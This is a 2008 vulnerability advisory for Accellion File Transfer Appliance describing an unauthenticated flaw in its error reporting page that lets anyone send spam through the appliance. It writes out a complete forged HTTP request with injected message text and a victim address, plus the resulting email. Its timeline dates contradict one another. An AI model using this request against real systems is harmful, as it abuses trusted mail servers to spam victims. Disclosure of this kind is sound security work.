Title: Accellion File Transfer - SPAM Engine Vulnerabilities Criticality: High (3/3) Affected software: Accellion File Transfer FTA_7_0_178 Author: Eric BEAULIEU, eric.beaulieu \[at\] zebux.org, http:\\www.zebux.org Discovery Date: 20-08-2008 Issue solved: 18-08-2008 Location URL: http://www.zebux.org/pub/Advisory/Advisory_Accellion_SPAM_Engine_Vulnerability_200808.txt Summary ------- Accellion File Transfer Appliance is prone to a vulnerability that can be exploited, without any authentication, by malicious remote people to conduct a SPAM attack. Description ----------- A vulnerability has been discovered in Accelion "error reporting page", which could be exploited to send mass mailing to internal or external email address. The error reporting page is used to informed Accellion administrator and Accellion support that there is a problem on the appliance (for example to inform that an URL doesn't exist). Users have an interface to describe the problem and set his email address to receive a message with an Accellion support ticket ID. But if a malicious user add, with the ID error reference (in the URL address bar), a message, he will received the ticket ID and the message text. So malicious people could use this URL address to send external and internal mass mailing (because Accellion appliance is always allowed to send external and internal on SMTP infrastructure). Example: To exploit this vulnerability, you have to forge a malicious HTTP request (for example with Firefox module: Live HTTP Headers): URL: https://[Accelion web server]/courier/1000@/api_error_email.html?id=1002K725PI-888-100Test_SPAM <H1>SPAM_ATTACK</H1> HTTP HEADER: Host: [Accelion web server] User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: https://[Accelion web server]/courier/1000@/api_error_email.html?id=1002K725PI-888-100Test_SPAM <H1>SPAM_ATTACK</H1> Content-Type: application/x-www-form-urlencoded Content-Length: 131 POST DATA: description=Could+you+please+close+this+tickets%0D%0A%0D%0ARegards&client_email=email_to_spam%40victim_domain.com&submit=Soumettre+le+rapport Malicious message will be : From : support@accellion.com [mailto:support@accellion.com] &#192; : email_to_spam@victim_domain.com Objet : API Error Report: 1002K725PI-888-100Test_SPAM <H1>SPAM_ATTACK</H1> Hi email_to_spam, Error ID 1002K725PI-888-100Test_SPAM SPAM_ATTACK Timestamp 2008-08-19 08:20:53 GMT This email has been sent to you for your own reference. We will attend to this error report as soon as possible. Thank you for using Secure File Transfer. ________________________________________ Accellion Pte Ltd http://www.accellion.com Solution -------- Upgrade to version FTA_7_0_189 Workaround ---------- There is not workaround. References ---------- FrSIRT Advisory: Bugtraq ID: 31178 Websense Advisory URL: Secunia Advisory ID: SA31848 CVE ID: Security Tracker: 1020870 Timeline -------- 20-08-2008 - Vulnerability was been discovered 21-08-2008 - Vulnerability reported to vendor 22-08-2008 - Vendor informed the stat of fix process 28-08-2006 - Vendor published the new version and contact Accellion customers Revision history ---------------- 18-08-2008 - 1.0 - Advisory written